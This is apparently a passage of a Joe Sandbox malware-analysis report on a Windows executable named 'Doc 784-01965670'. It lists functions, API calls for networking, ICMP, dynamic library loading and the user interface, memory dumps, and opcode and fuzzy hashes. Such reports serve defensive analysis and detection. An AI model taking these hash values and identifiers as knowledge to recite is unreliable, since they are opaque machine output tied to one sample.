                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                                                                                    • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                                    • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                                    • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                                                                                    • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                                    • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                                                                                    Function 0046BD4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                                    • gethostbyname.WSOCK32(?), ref: 0046BD78
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                                                                                    • inet_ntoa.WSOCK32(00000000), ref: 0046BDCD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 1515696956-2761332787
                                                                                                                                    • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                                    • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                                                                                    • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                                    • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                                                                                    Function 004497A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                    • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                                                                                    • DrawMenuBar.USER32 ref: 00449828
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 772068139-4108050209
                                                                                                                                    • Opcode ID: 80c8cc45c3a2388c5d5a2fad2fa293faafe293b1266d5f5cdbd09ec66a21ca10
                                                                                                                                    • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                                                                                    • Opcode Fuzzy Hash: 80c8cc45c3a2388c5d5a2fad2fa293faafe293b1266d5f5cdbd09ec66a21ca10
                                                                                                                                    • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                                                                                    Function 004342A8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocTask_wcslen
                                                                                                                                    • String ID: hkG
                                                                                                                                    • API String ID: 2651040394-3610518997
                                                                                                                                    • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                                    • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                                                                                    • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                                    • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                                                                                    Function 0043416A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                    • API String ID: 2574300362-1816364905
                                                                                                                                    • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                                    • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                                                                                    • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                                    • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                                                                                    Function 004343CE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,00000000,?,?,00000101,?,?), ref: 004343DE
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                                    • API String ID: 2574300362-58917771
                                                                                                                                    • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                                    • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                                                                                    • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                                    • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                                                                                    Function 004343FD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                                    • API String ID: 2574300362-3530519716
                                                                                                                                    • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                                    • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                                                                                    • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                                    • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                                                                                    Function 0043442C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                                    • API String ID: 2574300362-275556492
                                                                                                                                    • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                                    • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                                                                                    • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                                    • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                                                                                    Function 0040EE70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: IsWow64Process$kernel32.dll
                                                                                                                                    • API String ID: 2574300362-3024904723
                                                                                                                                    • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                                                                                    • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
                                                                                                                                    • Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                                                                                    • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                                                                                                                                    Function 0040ACA0 Relevance: 6.4, APIs: 4, Instructions: 368COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClearVariant
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                    • Opcode ID: 864e75c6b64c8395072179653f2e6e54ed688e1196af63861ce1262d91a289fa
                                                                                                                                    • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                                                                                    • Opcode Fuzzy Hash: 864e75c6b64c8395072179653f2e6e54ed688e1196af63861ce1262d91a289fa
                                                                                                                                    • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                                                                                    Function 0041456C Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __flush.LIBCMT ref: 00414630
                                                                                                                                    • __fileno.LIBCMT ref: 00414650
                                                                                                                                    • __locking.LIBCMT ref: 00414657
                                                                                                                                    • __flsbuf.LIBCMT ref: 00414682
                                                                                                                                      • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                      • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3240763771-0
                                                                                                                                    • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                                    • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                                                                                    • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                                    • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                                                                                    Function 004781AE Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                    • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                    • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CopyVariant$ErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2286883814-0
                                                                                                                                    • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                                    • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                                                                                    • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                                    • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                                                                                    Function 0047404B Relevance: 6.1, APIs: 4, Instructions: 133networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                                                                                    • #21.WSOCK32 ref: 004740E0
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1881357543-0
                                                                                                                                    • Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                                                                    • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                                                                                    • Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                                                                    • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                                                                                    Function 00441CB4 Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                    • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                                    • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                                                                                    • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                                    • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                                                                                    Function 0042384A Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
